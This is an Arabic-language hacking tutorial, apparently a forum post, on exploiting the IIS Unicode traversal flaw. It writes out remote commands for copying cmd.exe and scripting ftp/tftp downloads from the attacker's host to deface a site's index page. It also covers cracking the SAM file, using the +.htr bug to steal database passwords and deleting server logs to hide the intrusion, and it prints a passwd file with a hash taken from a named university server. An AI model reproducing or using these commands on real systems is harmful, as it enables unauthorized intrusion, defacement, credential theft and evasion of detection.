الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.e...ay@Hotmail.com+>+c:\inetpub\wwwroot\index.htm

تكملة2
-طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..A¯....cripts/cmd1.exe

الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
http://www.xxxx.com/msadc/..A¯....1.exe?c+dir+c:\


- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1-لطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
http://www.xxxx.com/msadc/..A¯....cripts/cmd1.exe

2-الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
oاولا انشاء صفحة باسم test.shtml
oتكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
oكتابة هذا الكود داخل الصفحة بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
oالان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml
oالان سوف تظهر لك الصفحة .
oالان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
oاذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3-الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5-البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .


-كيفية عمل اكاونت للدخول بواسطة الـFTP .
1-نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe

2-انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl

3-الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl

4-الان مطلوب ادراج البريد hExRay@Hotmail.Com الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl

5-إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl

6-الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl

7-يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl

8-لان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl

9-هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl

10-لان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open FTP.host.com
- Anonymous
- hEx@Hotmail.Com
- User Anonymous
- hEx@Hotmail.Com
- Get index.html
- Quit

/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"


-طريقة كشف باسورد الادمينستريتور .
نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack كما هو موضح بالشكل التالي:-



-اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro



l\Lsa\SYSTEM32\PASSFILT.DLL

-اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
http://www.xxxx.com/default.asp+.htr

عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .

ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
-تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
1-قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\
2-قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .


/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm

tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm اسم الملف بجهازك
\inetpub\wwwroot\ اسم الدليل في السيرفر
index.htm اسم الملف على السيرفر


-مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log
sNiper_hEx >>

هذه عبارة عن اسغلال ثغرات اليونيكود


ثانيا : استغلال الثغرات العادية :
الثغرات العادية تكون مثل هذه الثغرة يتم استغلالها عن طريق المتصفح http://www.mit.edu/afs/athena/system/sun4m_54/srvd/etc / هذه الثغرة في نظام ليونكس وفي مجلد etc يوجد ملف passwd المضلل + ملف shadow المشفر

خامسا: ملف passwd وما فائدته:
ملف الباسورد تكون فيه باسورد الموقع ولكنها اما ان تكون مشفرة مثل هذا /
>>

root:SSpbaftOt8rE6:0:1:0000-Admin(0000):/:/bin/athena/tcsh
daemon:NP:1:1:0000-Admin(0000):/:
bin:NP:2:2:0000-Admin(0000):/usr/bin:
sys:NP:3:3:0000-Admin(0000):/:
adm:NP:4:4:0000-Admin(0000):/var/adm:
lp:NP:71:8:0000-lp(0000):/usr/spool/lp:
smtp:NP:0:0:mail daemon user:/:
uucp:NP:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:NP:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:*LK*:37:4:Network Admin:/usr/net/nls:
nobody:NP:60001:60001:uid no body:/:
noaccess:NP:60002:60002:uid no access:/:

تكلمة 3 >>

يكون بعد كلمة root SSpbaftOt8rE6 ولكن لا تفرح كثير ا لان جميع ملفاات passwd تكون مضللة مثل >>

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksn >>

يكون بعد كلمة root x ولهذت لن اقوم بشرح فك تشفير الملف المشفر الان >>

سادسا: كيفية فك تشفير ملف passwd:
لن اقوم بشرح فك التشفير ملف passwd لانه وفي وقتنا الحاظر لا يوجد ملف passwd مشفر كلها مضللة ولذلك سوف اشرح ماذا تفعل اذا كان الملف مضللا >>

سابعا: اذا كان ملف passwd مضلل ماذا تفعل :
الان جميع ملفات passwd تكون مضللة ولكن توجد طريقة لفكه
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو shadow
ماهي اماكن تواجد ملف shadow في الأنظمة وهذا منقول من درس الكندور
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :

Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *

token تعني الرمز الذي يوجد في الملف passwd ، وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه)